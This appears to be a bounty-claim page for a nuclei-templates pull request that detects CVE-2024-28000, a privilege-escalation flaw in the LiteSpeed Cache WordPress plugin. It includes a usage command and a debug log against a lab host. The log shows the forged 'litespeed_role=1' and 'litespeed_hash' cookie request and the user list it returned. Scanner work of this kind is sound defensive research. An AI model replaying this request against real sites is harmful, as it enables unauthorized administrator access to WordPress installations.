PR
CVE-2024-28000
projectdiscovery/nuclei-templates#13258
/claim #13222
Template / PR Information
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.
This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1
Details
ID: CVE-2024-28000
Severity: critical
Variable required: litespeed_hash (supplied with -var litespeed_hash=HASH).
Usage
nuclei -t CVE-2024-28000.yaml -u https://target-site.com -var litespeed_hash=HASH
Template Validation
I’ve validated this template locally?
- YES
- NO
Used Plugin
Name: LiteSpeed Cache
Version: 6.3.0.1
Debug
nuclei -t ./test2.yaml -u http://192.168.1.10:8888/ -var litespeed_hash="jdeR85" -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.10
projectdiscovery.io
[WRN] Found 22 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-28000] Dumped HTTP request for http://192.168.1.10:8888/wp-json/wp/v2/users
GET /wp-json/wp/v2/users HTTP/1.1
Host: 192.168.1.10:8888
User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: litespeed_role=1; litespeed_hash=jdeR85
Accept-Encoding: gzip
[DBG] [CVE-2024-28000] Dumped HTTP response http://192.168.1.10:8888/wp-json/wp/v2/users
HTTP/1.1 200 OK
Connection: close
Content-Length: 1501
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: GET, POST
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Content-Type: application/json; charset=UTF-8
Date: Mon, 15 Sep 2025 03:10:55 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Link: <http://localhost:8888/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.65 (Debian)
X-Content-Type-Options: nosniff
X-Litespeed-Tag: fc6_tag_priv,public:fc6_HTTP.200
X-Powered-By: PHP/8.2.29
X-Robots-Tag: noindex
X-Wp-Total: 2
X-Wp-Totalpages: 1
[{"id":1,"name":"admin","url":"http:\/\/localhost:8888","description":"","link":"http:\/\/localhost:8888\/author\/admin\/","slug":"admin","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/5edfa2692bdacc5e6ee805c626c50cb44cebb065f092d9a1067d89f74dacd326?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users\/1","targetHints":{"allow":["GET","POST","PUT","PATCH","DELETE"]}}],"collection":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users"}]}},{"id":2,"name":"nuclei-a","url":"","description":"","link":"http:\/\/localhost:8888\/author\/nuclei-a\/","slug":"nuclei-a","avatar_urls":{"24":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=24&d=mm&r=g","48":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=48&d=mm&r=g","96":"https:\/\/secure.gravatar.com\/avatar\/21a0f83ea74911a98a543e9e9f73508aa37b2b87e9dbe840e6ec796f217bab76?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users\/2","targetHints":{"allow":["GET","POST","PUT","PATCH","DELETE"]}}],"collection":[{"href":"http:\/\/localhost:8888\/wp-json\/wp\/v2\/users"}]}}]
[CVE-2024-28000:status-1] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[CVE-2024-28000:regex-2] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[CVE-2024-28000:word-3] [http] [critical] http://192.168.1.10:8888/wp-json/wp/v2/users
[INF] Scan completed in 145.2397ms. 3 matches found.
Additional References:
- https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
- https://www.exploit-db.com/exploits/52328
- https://nvd.nist.gov/vuln/detail/CVE-2024-28000
- https://vulncheck.com/xdb/6f169f41e032
- https://github.com/JohnDoeAnonITA/CVE-2024-28000
- https://github.com/advisories/GHSA-3cp9-7899-h8r7
- https://github.com/SSSSuperX/CVE-2024-28000
- https://github.com/arch1m3d/CVE-2024-28000
- https://github.com/ebrasha/CVE-2024-28000
- https://github.com/Alucard0x1/CVE-2024-28000
Claim
Total prize pool
$100
Total paid
$0
Status
Pending
Submitted
September 15, 2025
Last updated
September 15, 2025
Contributors
HO
hoanpk912
@hoanpk912
Sponsors
PR
ProjectDiscovery
@projectdiscovery
$100